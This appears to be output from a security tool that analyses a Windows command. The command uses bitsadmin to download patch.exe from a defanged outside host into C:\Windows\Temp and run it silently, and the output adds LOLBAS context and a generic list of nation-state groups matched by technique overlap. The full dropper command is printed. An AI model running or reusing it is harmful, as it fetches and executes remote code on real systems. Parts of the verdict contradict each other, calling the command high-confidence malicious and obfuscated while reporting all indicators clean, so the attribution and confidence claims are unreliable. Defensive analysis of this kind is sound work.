Malicious — high-confidence attack behavior
Multiple corroborating attack signals: Dropper.
bitsadmin /transfer "WindowsUpdate" /download /priority normal hxxp://update-svc[.]xyz/patch.exe C:\Windows\Temp\patch.exe & C:\Windows\Temp\patch.exe /quiet
Uses the Windows BITS file-transfer utility to download a file from `update-svc.xyz` to `C:\Windows\Temp\patch.exe`, then runs `patch.exe` with arguments: `/quiet`.
The command leverages Bitsadmin.exe, a Windows binary catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: Execute, ADS, and Copy.
1 network indicator were extracted (0 IPs, 1 URL) and returned no hits across queried threat intelligence sources.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
All indicators appear clean across queried sources.
Used for managing background intelligent transfer
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Russian SVR threat group responsible for the SolarWinds supply chain attack and numerous government breaches. Known for stealthy, long-dwell intrusions.
Russian GRU Unit 74455 group responsible for NotPetya, attacks on Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Russian FSB-linked group known for sophisticated backdoors and hijacking other threat actors' infrastructure. Active since at least 2004.
North Korean state-sponsored group linked to the $81M Bangladesh Bank heist, WannaCry ransomware, and Sony Pictures breach. The most prolific nation-state financial threat actor.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.